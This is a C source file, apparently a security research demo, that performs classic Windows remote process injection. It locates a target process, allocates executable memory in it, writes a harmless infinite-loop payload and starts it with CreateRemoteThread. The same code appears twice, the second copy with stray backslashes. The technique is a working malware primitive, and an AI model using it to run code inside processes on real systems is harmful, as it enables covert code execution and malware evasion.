c0d3inj3cT/processinjector.c

## processinjector.c
/*
This code can be used to test the code injection in a remote process
The CPU usage will be at its peak after running this code
as a result of injecting the bytes, 0xeb, 0xfe into the remote process
If you get a high CPU usage for the remote process, you have successfully
injected the code. You can also confirm it by attaching a debugger to the
remote process and setting a  breakpoint at the return address of VirtualAllocEx()

c0d3inj3cT
*/

#include <windows.h>
#include <stdio.h>
#include <TlHelp32.h>

int main(int argc, char **argv)
{
HANDLE psnap;
HANDLE process;
void *address;
char code[] = {0xeb, 0xfe, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
PROCESSENTRY32 pe;
int pid=0;
int tid;
char *pname=argv[1];
pe.dwSize = sizeof(PROCESSENTRY32);

if(argc != 2)
{
	printf("usage: processinjector.exe <processname>\n");
	exit(0);
}

psnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

printf("handle of process snapshot is: %x\n", psnap);

if(!Process32First(psnap, &pe))
{
	printf("There was an error in retrieving the process information\n");
	exit(0);
}

if(strcmp(pname, pe.szExeFile) == 0)
{
	printf("process id is: %x\n", pe.th32ProcessID);
	pid = pe.th32ProcessID;
}

while(Process32Next(psnap, &pe))
{
	if(strcmp(pname, pe.szExeFile) == 0)
	{
		printf("process id is: %x\n", pe.th32ProcessID);
		pid = pe.th32ProcessID;
		break;
	}
}

if(pid==0)
{
	printf("process is not running\n");
	exit(0);
}

process=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, 0, pid);

address=VirtualAllocEx(process, NULL, 0x10, 0x1000, 0x40);

printf("Allocated memory in remote process at address: %p\n",address);

WriteProcessMemory(process, address, code, sizeof(code), NULL);

printf("code written to memory\n");

CreateRemoteThread(process, NULL, 0, address, NULL, 0, &tid);

printf("Remote Thread with id: %x created successfully\n", tid);

return 0;
}
	/*
	This code can be used to test the code injection in a remote process
	The CPU usage will be at its peak after running this code
	as a result of injecting the bytes, 0xeb, 0xfe into the remote process
	If you get a high CPU usage for the remote process, you have successfully
	injected the code. You can also confirm it by attaching a debugger to the
	remote process and setting a breakpoint at the return address of VirtualAllocEx()

	c0d3inj3cT
	*/

	#include <windows.h>
	#include <stdio.h>
	#include <TlHelp32.h>

	int main(int argc, char **argv)
	{
	HANDLE psnap;
	HANDLE process;
	void *address;
	char code[] = {0xeb, 0xfe, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
	PROCESSENTRY32 pe;
	int pid=0;
	int tid;
	char *pname=argv[1];
	pe.dwSize = sizeof(PROCESSENTRY32);

	if(argc != 2)
	{
	printf("usage: processinjector.exe <processname>\n");
	exit(0);
	}

	psnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	printf("handle of process snapshot is: %x\n", psnap);

	if(!Process32First(psnap, &pe))
	{
	printf("There was an error in retrieving the process information\n");
	exit(0);
	}

	if(strcmp(pname, pe.szExeFile) == 0)
	{
	printf("process id is: %x\n", pe.th32ProcessID);
	pid = pe.th32ProcessID;
	}

	while(Process32Next(psnap, &pe))
	{
	if(strcmp(pname, pe.szExeFile) == 0)
	{
	printf("process id is: %x\n", pe.th32ProcessID);
	pid = pe.th32ProcessID;
	break;
	}
	}

	if(pid==0)
	{
	printf("process is not running\n");
	exit(0);
	}

	process=OpenProcess(PROCESS_CREATE_THREAD\|PROCESS_VM_OPERATION\|PROCESS_VM_READ\|PROCESS_VM_WRITE\|PROCESS_QUERY_INFORMATION, 0, pid);

	address=VirtualAllocEx(process, NULL, 0x10, 0x1000, 0x40);

	printf("Allocated memory in remote process at address: %p\n",address);

	WriteProcessMemory(process, address, code, sizeof(code), NULL);

	printf("code written to memory\n");

	CreateRemoteThread(process, NULL, 0, address, NULL, 0, &tid);

	printf("Remote Thread with id: %x created successfully\n", tid);

	return 0;
	}